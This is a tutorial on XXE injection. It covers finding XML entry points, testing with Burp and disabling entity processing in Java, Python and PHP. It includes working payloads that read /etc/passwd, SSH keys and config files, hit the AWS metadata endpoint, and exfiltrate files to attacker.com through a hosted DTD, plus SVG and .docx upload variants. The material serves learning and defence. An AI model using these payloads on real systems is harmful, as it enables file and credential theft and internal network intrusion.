XML External Entity (XXE) injection is a class of attack that exploits insecure XML parsers to read arbitrary files from the server, perform server-side request forgery, and in some cases achieve remote code execution. Despite XML being “old technology,” XXE vulnerabilities appear constantly in modern applications — especially in APIs, document upload features, and SOAP web services. It appears on the OWASP Top 10 under A05 (Security Misconfiguration) and was a standalone entry in previous editions.
Understanding XML and External Entities
XML allows you to define entities — essentially variables that the parser replaces with their values when processing the document. External entities extend this by fetching content from a URL or file path:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY example "Hello World">
]>
<root>&example;</root>
When the parser processes &example;, it replaces it with “Hello World”. An external entity fetches the replacement value from an external source:
<!ENTITY ext SYSTEM "file:///etc/passwd">
If the parser resolves this entity and includes the content in the response, the attacker reads /etc/passwd. That’s XXE.
Finding XXE Vulnerabilities
XXE requires the application to:
- Parse XML input
- Have external entity processing enabled (often the default)
Look for these entry points:
- File upload features that accept
.xml, .docx, .xlsx, .svg, .pdf (PDF generators often use XML internally)
- SOAP API endpoints (SOAP is XML-based)
- REST APIs with
Content-Type: application/xml
- JSON endpoints that also accept XML (change
Content-Type and test)
- RSS/Atom feed parsers
Tip: Even endpoints that normally accept JSON may fall back to XML parsing. Change the Content-Type header to application/xml and submit an XML body.
Basic XXE: Reading Local Files
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<userInfo>
<username>&xxe;</username>
</userInfo>
If the application reflects the <username> value in the response and the parser resolves external entities, you’ll see the contents of /etc/passwd in the response body.
Windows targets:
<!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
Sensitive files to target:
/etc/passwd # User accounts
/etc/shadow # Password hashes (requires root-level access)
/proc/self/environ # Environment variables (may contain secrets)
/proc/self/cmdline # Running process command line
~/.ssh/id_rsa # SSH private key
/var/www/html/config.php # Web app config (database credentials)
XXE for SSRF
External entities aren’t limited to file://. The http:// scheme turns XXE into SSRF:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<data>&xxe;</data>
This hits the AWS IMDS endpoint from the server’s perspective — same impact as a direct SSRF vulnerability. You can also probe internal services:
<!ENTITY xxe SYSTEM "http://192.168.1.10:8080/admin/">
Blind XXE: Out-of-Band Exfiltration
When the XXE payload succeeds but the response doesn’t reflect the entity content (blind XXE), you need out-of-band exfiltration via DNS or HTTP callbacks.
DNS-Based Detection
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://abc123.burpcollaborator.net/">
]>
<data>&xxe;</data>
A DNS lookup to your Burp Collaborator domain confirms the parser resolves external entities.
HTTP-Based File Exfiltration
Host a malicious DTD on your server (http://attacker.com/evil.dtd):
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % exfil "<!ENTITY % send SYSTEM 'http://attacker.com/?data=%file;'>">
%exfil;
%send;
Then reference it in your payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<data>trigger</data>
The server fetches your DTD, which defines a parameter entity that reads the file and sends it to your server as a query string parameter. This bypasses restrictions on inline entities and works even when the response body doesn’t reflect entity values.
XXE via SVG Upload
SVG files are XML, and many image processing libraries parse external entities. Upload this as a .svg:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<svg xmlns="http://www.w3.org/2000/svg">
<text>&xxe;</text>
</svg>
If the application renders the SVG (for thumbnail generation, for example), the server hostname appears in the output.
Modern Office formats are ZIP archives containing XML files. Open a .docx, edit word/document.xml, and inject an XXE payload:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE doc [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<w:document>&xxe;</w:document>
Repack the ZIP and upload the modified .docx. If the server’s document processing library parses it without disabling external entities, you read the file.
Using Burp Suite to Test XXE
- Intercept a request containing XML in Burp Repeater.
- Add the DOCTYPE declaration after the XML processing instruction.
- Define an external entity referencing
file:///etc/passwd.
- Reference the entity inside an existing XML element that’s reflected in the response.
- Check the response for file contents.
Burp’s Active Scan also automatically tests for XXE when XML input is detected.
Preventing XXE
Disable External Entity Processing
The safest fix is disabling DTD processing entirely at the parser level:
Java (DocumentBuilderFactory):
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
Python (lxml):
from lxml import etree
parser = etree.XMLParser(resolve_entities=False, no_network=True)
PHP:
libxml_disable_entity_loader(true);
Use JSON Where Possible
If your API doesn’t need XML, use JSON. No XML parser, no XXE.
Reject XML input containing <!DOCTYPE or <!ENTITY declarations. Web application firewalls (WAFs) should have XXE signatures enabled, though they can often be bypassed and should not be the sole defense.
Conclusion
XXE is one of those vulnerabilities that looks arcane on paper but is devastatingly simple to exploit when you find it. A single vulnerable XML endpoint can expose the entire server filesystem, internal network topology, and sensitive credentials. Test for XXE anywhere the application processes XML, including hidden attack surfaces like file uploads and API format negotiation. On the defense side, disabling external entity processing at the parser level is the only reliable fix — blocklisting approaches are consistently bypassed.